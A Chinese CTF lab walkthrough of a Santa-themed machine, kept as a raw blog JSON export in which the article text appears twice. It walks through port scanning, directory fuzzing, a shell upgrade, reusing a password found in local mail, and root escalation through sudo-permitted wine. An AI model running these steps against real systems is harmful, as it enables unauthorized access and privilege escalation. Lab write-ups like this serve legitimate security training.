![\"image-20240320130010943\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453895.png\")
<\/div><\/p>\n\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240320130047900\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453901.png\")
<\/div><\/p>\n\u770b\u6837\u5b50\u5e94\u8be5\u662f\u7684\u4e86\uff0c\u5f00\u59cb\u5165\u624b\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\n\u626b\u63cf\u5f00\u653e\u7aef\u53e3<\/h3>\nnmap -sT -T4 -sV -p- 10.0.2.6 <\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)\n80\/tcp open http Apache httpd\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u7206\u7834<\/h3>\n
![\"image-20240320132439826\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u6211\u8d85\uff0c\u9ed1\u9875\u3002<\/p>\n
<\/div><\/p>\ndirb http:\/\/10.0.2.6<\/code><\/pre>\n---- Scanning URL: http:\/\/10.0.2.6\/ ----\n==> DIRECTORY: http:\/\/10.0.2.6\/administration\/ \n+ http:\/\/10.0.2.6\/index.html (CODE:200|SIZE:1012) \n==> DIRECTORY: http:\/\/10.0.2.6\/javascript\/ \n+ http:\/\/10.0.2.6\/robots.txt (CODE:200|SIZE:70) \n+ http:\/\/10.0.2.6\/server-status (CODE:403|SIZE:199) \n\n---- Entering directory: http:\/\/10.0.2.6\/administration\/ ----\n\n---- Entering directory: http:\/\/10.0.2.6\/javascript\/ ----\n==> DIRECTORY: http:\/\/10.0.2.6\/javascript\/jquery\/ \n\n---- Entering directory: http:\/\/10.0.2.6\/javascript\/jquery\/ ----\n+ http:\/\/10.0.2.6\/javascript\/jquery\/jquery (CODE:200|SIZE:289782) <\/code><\/pre>\n\u518dfuzz<\/code>\u4e00\u4e0b\uff1a<\/p>\nffuf -u http:\/\/10.0.2.6\/FUZZ -w directory-list-lowercase-2.3-medium.txt<\/code><\/pre>\njavascript [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 1ms]\nadministration [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 28ms]\nsanta [Status: 301, Size: 230, Words: 14, Lines: 8, Duration: 1ms]\n [Status: 200, Size: 1012, Words: 278, Lines: 24, Duration: 0ms]\nserver-status [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 30ms]<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\n\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u5f31\u53e3\u4ee4\u4ee5\u53casql\u6ce8\u5165\uff0c\u4f46\u662f\u672a\u679c\uff0c\u9010\u6e10\u66b4\u8e81\uff0c\u7a81\u7136\u5c31\u4e0d\u89c1\u4e86\uff0c\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u6253\u5f00\u4e3b\u9875\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u88ab\u7be1\u6539\u4e86\uff0c\u91cd\u65b0\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
sudo nmap -sC -sV -T4 -A -p- 10.0.2.6<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 76:06:46:f1:83:85:a4:22:8c:2b:12:d4:2d:58:27:49 (ECDSA)\n|_ 256 76:54:26:9d:e8:4a:72:5e:6e:7f:68:58:20:6e:bb:d4 (ED25519)\n80\/tcp open http Apache httpd\n|_http-title: Merry Christmas to everyone - Santa Claus\n|_http-server-header: Apache\n54571\/tcp open unknown\nMAC Address: 08:00:27:99:CD:C7 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.8\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u53d1\u73b0\u591a\u5f00\u4e86\u4e00\u4e2a\u7aef\u53e3\uff01\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u963f\u54f2\u3002\u3002\u3002<\/p>\n
\u63d0\u6743<\/h2>\n
\u8001\u6837\u5b50\u4fe1\u606f\u641c\u96c6\uff0c\u4fe1\u606f\u641c\u96c6\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\uff01<\/p>\n
\u5347\u7ea7\u4e00\u4e0bshell<\/h3>\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n\u62ff\u5230\u7b2c\u4e00\u4e2aflag\uff01<\/p>\n
<\/div><\/p>\necho $PATH\n# \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin<\/code><\/pre>\n\u8fd9\u4fe9games<\/code>\u90fd\u6ca1\u5565\u4e1c\u897f\uff1a<\/p>\n\u53bbhome\u627e\u5230\u4e94\u4e2a\u7528\u6237\uff1a<\/p>\n
alabaster bill bushy pepper santa shinny sugurplum wunorse<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u6f2b\u957f\u7684\u4fe1\u606f\u641c\u96c6\uff0c\u6700\u540e\u53d1\u73b0\u4e86\u4e00\u4e2a\u4e1c\u897f\uff1a<\/p>\n
alabaster@santa:\/var\/www\/html$ cd ..\/\ncd ..\/\nalabaster@santa:\/var\/www$ ls\nls\nhtml\nalabaster@santa:\/var\/www$ cd ..\/\ncd ..\/\nalabaster@santa:\/var$ ls\nls\nbackups crash local log opt snap tmp\ncache lib lock mail run spool www\nalabaster@santa:\/var$ ls -l mail\nls -l mail\ntotal 4\n-rw-rw---- 1 alabaster mail 1156 Mar 20 05:35 alabaster\n-rw------- 1 root mail 0 Jan 4 10:41 root\nalabaster@santa:\/var$ mail\nmail\n"\/var\/mail\/alabaster": 1 message 1 new\n>N 1 Santa Claus Wed Mar 20 05:35 25\/1108 Important update about th\n? fuck\nfuck\nUnknown command: fuck\n? 1\n1\nReturn-Path: <santa@santa.hmv>\nReceived: from santa.hmv (localhost [127.0.0.1])\n by santa.hmv (8.17.1.9\/8.17.1.9\/Debian-2) with ESMTP id 42K5Z35o002068\n for <alabaster@santa.hmv>; Wed, 20 Mar 2024 05:35:03 GMT\nReceived: (from santa@localhost)\n by santa.hmv (8.17.1.9\/8.17.1.9\/Submit) id 42K5Z3LN002067;\n Wed, 20 Mar 2024 05:35:03 GMT\nFrom: Santa Claus <santa@santa.hmv>\nMessage-Id: <202403200535.42K5Z3LN002067@santa.hmv>\nSubject: Important update about the hack\nTo: <alabaster@santa.hmv>\nUser-Agent: mail (GNU Mailutils 3.15)\nDate: Wed, 20 Mar 2024 05:35:03 +0000\n\nDear Alabaster, \n\nAs you know our systems have been compromised. You have been assigned to restore all systems as soon as possible. \n\nI heard you have kicked out the Naughty Elfs so they cannot come back into the system. To be more secure we have hired Bill Gates. \n\nHis account has been created and ready to logon. When Bill arrives, tell him his--More--\n username is 'bill'. The password has been set to: 'JingleBellsPhishingSmellsHac--More--\nkersGoAway' He will know what to do next. \n--More--\n\n--More--\nPlease help Bill as much as possible so Christmas can go on! \n--More--\n\n--More--\n- Santa<\/code><\/pre>\n\u4ed6\u7ed9\u4e86\u6211\u4eecssh\u7684\u51ed\u8bc1\uff0c\u6211\u4eec\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\u5427\uff1a<\/p>\n
\u5207\u6362\u7528\u6237bill<\/h3>\nsu bill\nJingleBellsPhishingSmellsHackersGoAway<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\n
\u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n
sudo \/usr\/bin\/wine cmd<\/code><\/pre>\n<\/div><\/p>\nwtf\uff0c\u4ec0\u4e48\u60c5\u51b5\u3002<\/p>\n
\u7ecf\u8fc7\u7fa4\u4e3b\u63d0\u70b9\u4e00\u4e0b\uff0c\u5c1d\u8bd5\u4f7f\u7528ssh\u767b\u5f55\uff0c\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\u4e86\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u83b7\u53d6flag\uff01<\/p>\n
Z:\\home\\bill>cd \/root\n\nZ:\\root>dir\nVolume in drive Z has no label.\nVolume Serial Number is 4afb-ec36\n\nDirectory of Z:\\root\n\n 1\/4\/2024 12:25 PM <DIR> .\n12\/30\/2023 6:55 PM <DIR> ..\n12\/30\/2023 8:10 PM 3,130 root.txt\n12\/30\/2023 7:16 PM <DIR> snap\n 1 file 3,130 bytes\n 3 directories 2,250,649,600 bytes free\n\nZ:\\root>type root.txt\n ..,,,,,,,,,,,,,,,,..\n ..,,;;;;;;;;;;;;;;;;;;;;;;;;;;,,.\n .,::::;;;;aaaaaaaaaaaaaaaaaaaaaaaaaaa;;,,.\n .,;;,:::a@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a,\n ,;;;;.,a@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a\n ,;;;;%;.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a,\n ,;%;;;;%%;,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n ,;;%%;;;;;%%;;@@@@@@@@@@@@@@'%v%v%v%v%v%v%v%v%v%v%v%v`@@@@@@@@@\n ,;;%%;;;;:;;;%;;@@@@@@@@@'%vvvvvvvvvnnnnnnnnnnnnnnnnvvvvvv%`@@@@'\n ,;%%;;;;;:;;;;;;;;@@@@@'%vvva@@@@@@@@avvnnnnnnnnnnvva@@@@@@@OOov,\n ,;%;;;;;;:::;;;;;;;@@'OO%vva@@@@@@@@@@@@vvnnnnnnnnvv@@@@@@@@@@@Oov\n ;%;;;;;;;:::;;;;;;;;'oO%vvn@@%nvvvvvvvv%nnnnnnnnnnnnn%vvvvvvnn%@Ov\n ;;;;;;;;;:::;;;;;;::;oO%vvnnnn>>nn. `nnnnnnnnnnnn>>nn. `nnnvv'\n ;;;;;;;;;:::;;;;;;::;oO%vvnnvvmmmmmmmmmmvvvnnnnnn;%mmmmmmmmmmmmvv,\n ;;;;;;;;;:::;;;;;;::;oO%vvmmmmmmmmmmmmmmmmmvvnnnv;%mmmmmmmmmmmmmmmv,\n ;;;;;;;;;;:;;;;;;::;;oO%vmmmmnnnnnnnnnnnnmmvvnnnvmm;%vvnnnnnnnnnmmmv\n `;%;;;;;;;:;;;;::;;o@@%vvmmnnnnnnnnnnnvnnnnnnnnnnmmm;%vvvnnnnnnmmmv\n `;;%%;;;;;:;;;::;.oO@@%vmmnnnnnnnnnvv%;nnnnnnnnnmmm;%vvvnnnnnnmmv'\n `;;;%%;;;:;;;::;.o@@%vvnnnnnnnnnnnvv%;nnnnnnnmm;%vvvnnnnnnnv%'@a.\n a`;;;%%;;:;;;::;.o@@%vvvvvvvvvvvvvaa@@@@@@@@@@@@aa%%vvvvv%%@@@@o.\n .@@o`;;;%;;;;;;::;,o@@@%vvvvvvva@@@@@@@@@@@@@@@@@@@@@avvvva@@@@@%O,\n .@@@@@Oo`;;;;;;;;::;o@@@@@@@@@@@@@@@@@@@@"""""""@@@@@@@@@@@@@@@@@OO@a\n .@@@@@@@@@OOo`;;;;;;:;o@@@@@@@@@@@@@@@@" "@@@@@@@@@@@@@@oOO@@@,\n .@@@@o@@@@@@@OOo`;;;;:;o,@@@@@@@@@@%vvvvvvvvvvvvvvvvvv%%@@@@@@@@@oOOO@@@@@,\n @@@@o@@@@@@@@@OOo;::;'oOOooooooooOOOo%vvvvvvvvvvvvvv%oOOooooooooOOO@@@O@@@,\n @@@oO@@@@@@@@@OOa@@@@@a,oOOOOOOOOOOOOOOoooooooooooooOOOOOOOOOOOOOO@@@@Oo@@@\n @@@oO@@@@@@@OOa@@@@@@@@Oo,oO@@@@@@@@@@OOOOOOOOOOOOOO@@@@@@@@@@@@@@@@@@Oo@@@\n @@@oO@@@@@@OO@@@@@@@@@@@OO,oO@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@\n @@@@o@@@@@@OO@@@@@@@@@@OOO,oO@@@@@@@@@O@@@@@@@@@@@@@@@@@@@@@o@@@@@@@@@O@@@@\n @@@@@o@@@@@OOo@@@@@@@OOOO'oOO@@@@@@@@Oo@@@@@@@@@@@@O@@@@@@@@Oo@@@@@@@@@@@@a\n`@@@@@@@O@@@OOOo`OOOOOOO'oOO@@@@@@@@@O@@@@@@@@@@@@@@@O@@@@@@@@Oo@@@@@@@@@@@@\n `@@@@@OO@@@@@OOOooooooooOO@@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@Oo@@@@@@oO@@@@\n `@@@OO@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@O@@@@@@@oO@@@'\n `@@`O@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@@@@@@@@O@@@'\n `@ @@@@@@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@'@@'\n `@@@@@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@ a'\n `@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@'\n `@@@@@@@@@@@Oo@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@'\n `@@@@@@Oo@@@@O@@@@@@@@@@@@@@@@@@@'o@@'\n `@@@@@@@@oO@@@@@@@@@@@@@@@@@ a'\n `@@@@@oO@@@@@@@@@@@@@@' '\n '@@@o'`@@@@@@@@'\n @' .@@@@'\n @@'\n @'\n<\/code><\/pre>\n\u540c\u65f6\u8fd8\u611f\u8c22[mikannse]()\u5e08\u5085\u63d0\u7684\u610f\u89c1:<\/p>\n
<\/div><\/p>\n(\u8fd9\u6837\u7684\u8bdd\u4e0d\u5c31\u767d\u6a21\u7cca\u4e86\u3002\u3002\u3002\u3002\u3002)<\/p>\n","protected":false},"excerpt":{"rendered":"
savesanta \u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a \u770b\u6837\u5b50\u5e94\u8be5\u662f\u7684\u4e86\uff0c\u5f00\u59cb\u5165\u624b\u3002 \u4fe1\u606f\u641c\u96c6 \u626b\u63cf\u5f00\u653e\u7aef\u53e3 nmap […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-427","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=427"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions"}],"predecessor-version":[{"id":428,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions\/428"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=427"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
nmap -sT -T4 -sV -p- 10.0.2.6 <\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)\n80\/tcp open http Apache httpd\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u7206\u7834<\/h3>\n
<\/div><\/p>\n\u6211\u8d85\uff0c\u9ed1\u9875\u3002<\/p>\n
<\/div><\/p>\ndirb http:\/\/10.0.2.6<\/code><\/pre>\n---- Scanning URL: http:\/\/10.0.2.6\/ ----\n==> DIRECTORY: http:\/\/10.0.2.6\/administration\/ \n+ http:\/\/10.0.2.6\/index.html (CODE:200|SIZE:1012) \n==> DIRECTORY: http:\/\/10.0.2.6\/javascript\/ \n+ http:\/\/10.0.2.6\/robots.txt (CODE:200|SIZE:70) \n+ http:\/\/10.0.2.6\/server-status (CODE:403|SIZE:199) \n\n---- Entering directory: http:\/\/10.0.2.6\/administration\/ ----\n\n---- Entering directory: http:\/\/10.0.2.6\/javascript\/ ----\n==> DIRECTORY: http:\/\/10.0.2.6\/javascript\/jquery\/ \n\n---- Entering directory: http:\/\/10.0.2.6\/javascript\/jquery\/ ----\n+ http:\/\/10.0.2.6\/javascript\/jquery\/jquery (CODE:200|SIZE:289782) <\/code><\/pre>\n\u518dfuzz<\/code>\u4e00\u4e0b\uff1a<\/p>\nffuf -u http:\/\/10.0.2.6\/FUZZ -w directory-list-lowercase-2.3-medium.txt<\/code><\/pre>\njavascript [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 1ms]\nadministration [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 28ms]\nsanta [Status: 301, Size: 230, Words: 14, Lines: 8, Duration: 1ms]\n [Status: 200, Size: 1012, Words: 278, Lines: 24, Duration: 0ms]\nserver-status [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 30ms]<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\n\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u5f31\u53e3\u4ee4\u4ee5\u53casql\u6ce8\u5165\uff0c\u4f46\u662f\u672a\u679c\uff0c\u9010\u6e10\u66b4\u8e81\uff0c\u7a81\u7136\u5c31\u4e0d\u89c1\u4e86\uff0c\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u6253\u5f00\u4e3b\u9875\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u88ab\u7be1\u6539\u4e86\uff0c\u91cd\u65b0\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
sudo nmap -sC -sV -T4 -A -p- 10.0.2.6<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 76:06:46:f1:83:85:a4:22:8c:2b:12:d4:2d:58:27:49 (ECDSA)\n|_ 256 76:54:26:9d:e8:4a:72:5e:6e:7f:68:58:20:6e:bb:d4 (ED25519)\n80\/tcp open http Apache httpd\n|_http-title: Merry Christmas to everyone - Santa Claus\n|_http-server-header: Apache\n54571\/tcp open unknown\nMAC Address: 08:00:27:99:CD:C7 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.8\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u53d1\u73b0\u591a\u5f00\u4e86\u4e00\u4e2a\u7aef\u53e3\uff01\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u963f\u54f2\u3002\u3002\u3002<\/p>\n
\u63d0\u6743<\/h2>\n
\u8001\u6837\u5b50\u4fe1\u606f\u641c\u96c6\uff0c\u4fe1\u606f\u641c\u96c6\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\uff01<\/p>\n
\u5347\u7ea7\u4e00\u4e0bshell<\/h3>\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n\u62ff\u5230\u7b2c\u4e00\u4e2aflag\uff01<\/p>\n
<\/div><\/p>\necho $PATH\n# \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin<\/code><\/pre>\n\u8fd9\u4fe9games<\/code>\u90fd\u6ca1\u5565\u4e1c\u897f\uff1a<\/p>\n\u53bbhome\u627e\u5230\u4e94\u4e2a\u7528\u6237\uff1a<\/p>\n
alabaster bill bushy pepper santa shinny sugurplum wunorse<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u6f2b\u957f\u7684\u4fe1\u606f\u641c\u96c6\uff0c\u6700\u540e\u53d1\u73b0\u4e86\u4e00\u4e2a\u4e1c\u897f\uff1a<\/p>\n
alabaster@santa:\/var\/www\/html$ cd ..\/\ncd ..\/\nalabaster@santa:\/var\/www$ ls\nls\nhtml\nalabaster@santa:\/var\/www$ cd ..\/\ncd ..\/\nalabaster@santa:\/var$ ls\nls\nbackups crash local log opt snap tmp\ncache lib lock mail run spool www\nalabaster@santa:\/var$ ls -l mail\nls -l mail\ntotal 4\n-rw-rw---- 1 alabaster mail 1156 Mar 20 05:35 alabaster\n-rw------- 1 root mail 0 Jan 4 10:41 root\nalabaster@santa:\/var$ mail\nmail\n"\/var\/mail\/alabaster": 1 message 1 new\n>N 1 Santa Claus Wed Mar 20 05:35 25\/1108 Important update about th\n? fuck\nfuck\nUnknown command: fuck\n? 1\n1\nReturn-Path: <santa@santa.hmv>\nReceived: from santa.hmv (localhost [127.0.0.1])\n by santa.hmv (8.17.1.9\/8.17.1.9\/Debian-2) with ESMTP id 42K5Z35o002068\n for <alabaster@santa.hmv>; Wed, 20 Mar 2024 05:35:03 GMT\nReceived: (from santa@localhost)\n by santa.hmv (8.17.1.9\/8.17.1.9\/Submit) id 42K5Z3LN002067;\n Wed, 20 Mar 2024 05:35:03 GMT\nFrom: Santa Claus <santa@santa.hmv>\nMessage-Id: <202403200535.42K5Z3LN002067@santa.hmv>\nSubject: Important update about the hack\nTo: <alabaster@santa.hmv>\nUser-Agent: mail (GNU Mailutils 3.15)\nDate: Wed, 20 Mar 2024 05:35:03 +0000\n\nDear Alabaster, \n\nAs you know our systems have been compromised. You have been assigned to restore all systems as soon as possible. \n\nI heard you have kicked out the Naughty Elfs so they cannot come back into the system. To be more secure we have hired Bill Gates. \n\nHis account has been created and ready to logon. When Bill arrives, tell him his--More--\n username is 'bill'. The password has been set to: 'JingleBellsPhishingSmellsHac--More--\nkersGoAway' He will know what to do next. \n--More--\n\n--More--\nPlease help Bill as much as possible so Christmas can go on! \n--More--\n\n--More--\n- Santa<\/code><\/pre>\n\u4ed6\u7ed9\u4e86\u6211\u4eecssh\u7684\u51ed\u8bc1\uff0c\u6211\u4eec\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\u5427\uff1a<\/p>\n
\u5207\u6362\u7528\u6237bill<\/h3>\nsu bill\nJingleBellsPhishingSmellsHackersGoAway<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\n
\u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n
sudo \/usr\/bin\/wine cmd<\/code><\/pre>\n<\/div><\/p>\nwtf\uff0c\u4ec0\u4e48\u60c5\u51b5\u3002<\/p>\n
\u7ecf\u8fc7\u7fa4\u4e3b\u63d0\u70b9\u4e00\u4e0b\uff0c\u5c1d\u8bd5\u4f7f\u7528ssh\u767b\u5f55\uff0c\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\u4e86\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u83b7\u53d6flag\uff01<\/p>\n
Z:\\home\\bill>cd \/root\n\nZ:\\root>dir\nVolume in drive Z has no label.\nVolume Serial Number is 4afb-ec36\n\nDirectory of Z:\\root\n\n 1\/4\/2024 12:25 PM <DIR> .\n12\/30\/2023 6:55 PM <DIR> ..\n12\/30\/2023 8:10 PM 3,130 root.txt\n12\/30\/2023 7:16 PM <DIR> snap\n 1 file 3,130 bytes\n 3 directories 2,250,649,600 bytes free\n\nZ:\\root>type root.txt\n ..,,,,,,,,,,,,,,,,..\n ..,,;;;;;;;;;;;;;;;;;;;;;;;;;;,,.\n .,::::;;;;aaaaaaaaaaaaaaaaaaaaaaaaaaa;;,,.\n .,;;,:::a@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a,\n ,;;;;.,a@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a\n ,;;;;%;.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@a,\n ,;%;;;;%%;,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n ,;;%%;;;;;%%;;@@@@@@@@@@@@@@'%v%v%v%v%v%v%v%v%v%v%v%v`@@@@@@@@@\n ,;;%%;;;;:;;;%;;@@@@@@@@@'%vvvvvvvvvnnnnnnnnnnnnnnnnvvvvvv%`@@@@'\n ,;%%;;;;;:;;;;;;;;@@@@@'%vvva@@@@@@@@avvnnnnnnnnnnvva@@@@@@@OOov,\n ,;%;;;;;;:::;;;;;;;@@'OO%vva@@@@@@@@@@@@vvnnnnnnnnvv@@@@@@@@@@@Oov\n ;%;;;;;;;:::;;;;;;;;'oO%vvn@@%nvvvvvvvv%nnnnnnnnnnnnn%vvvvvvnn%@Ov\n ;;;;;;;;;:::;;;;;;::;oO%vvnnnn>>nn. `nnnnnnnnnnnn>>nn. `nnnvv'\n ;;;;;;;;;:::;;;;;;::;oO%vvnnvvmmmmmmmmmmvvvnnnnnn;%mmmmmmmmmmmmvv,\n ;;;;;;;;;:::;;;;;;::;oO%vvmmmmmmmmmmmmmmmmmvvnnnv;%mmmmmmmmmmmmmmmv,\n ;;;;;;;;;;:;;;;;;::;;oO%vmmmmnnnnnnnnnnnnmmvvnnnvmm;%vvnnnnnnnnnmmmv\n `;%;;;;;;;:;;;;::;;o@@%vvmmnnnnnnnnnnnvnnnnnnnnnnmmm;%vvvnnnnnnmmmv\n `;;%%;;;;;:;;;::;.oO@@%vmmnnnnnnnnnvv%;nnnnnnnnnmmm;%vvvnnnnnnmmv'\n `;;;%%;;;:;;;::;.o@@%vvnnnnnnnnnnnvv%;nnnnnnnmm;%vvvnnnnnnnv%'@a.\n a`;;;%%;;:;;;::;.o@@%vvvvvvvvvvvvvaa@@@@@@@@@@@@aa%%vvvvv%%@@@@o.\n .@@o`;;;%;;;;;;::;,o@@@%vvvvvvva@@@@@@@@@@@@@@@@@@@@@avvvva@@@@@%O,\n .@@@@@Oo`;;;;;;;;::;o@@@@@@@@@@@@@@@@@@@@"""""""@@@@@@@@@@@@@@@@@OO@a\n .@@@@@@@@@OOo`;;;;;;:;o@@@@@@@@@@@@@@@@" "@@@@@@@@@@@@@@oOO@@@,\n .@@@@o@@@@@@@OOo`;;;;:;o,@@@@@@@@@@%vvvvvvvvvvvvvvvvvv%%@@@@@@@@@oOOO@@@@@,\n @@@@o@@@@@@@@@OOo;::;'oOOooooooooOOOo%vvvvvvvvvvvvvv%oOOooooooooOOO@@@O@@@,\n @@@oO@@@@@@@@@OOa@@@@@a,oOOOOOOOOOOOOOOoooooooooooooOOOOOOOOOOOOOO@@@@Oo@@@\n @@@oO@@@@@@@OOa@@@@@@@@Oo,oO@@@@@@@@@@OOOOOOOOOOOOOO@@@@@@@@@@@@@@@@@@Oo@@@\n @@@oO@@@@@@OO@@@@@@@@@@@OO,oO@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@\n @@@@o@@@@@@OO@@@@@@@@@@OOO,oO@@@@@@@@@O@@@@@@@@@@@@@@@@@@@@@o@@@@@@@@@O@@@@\n 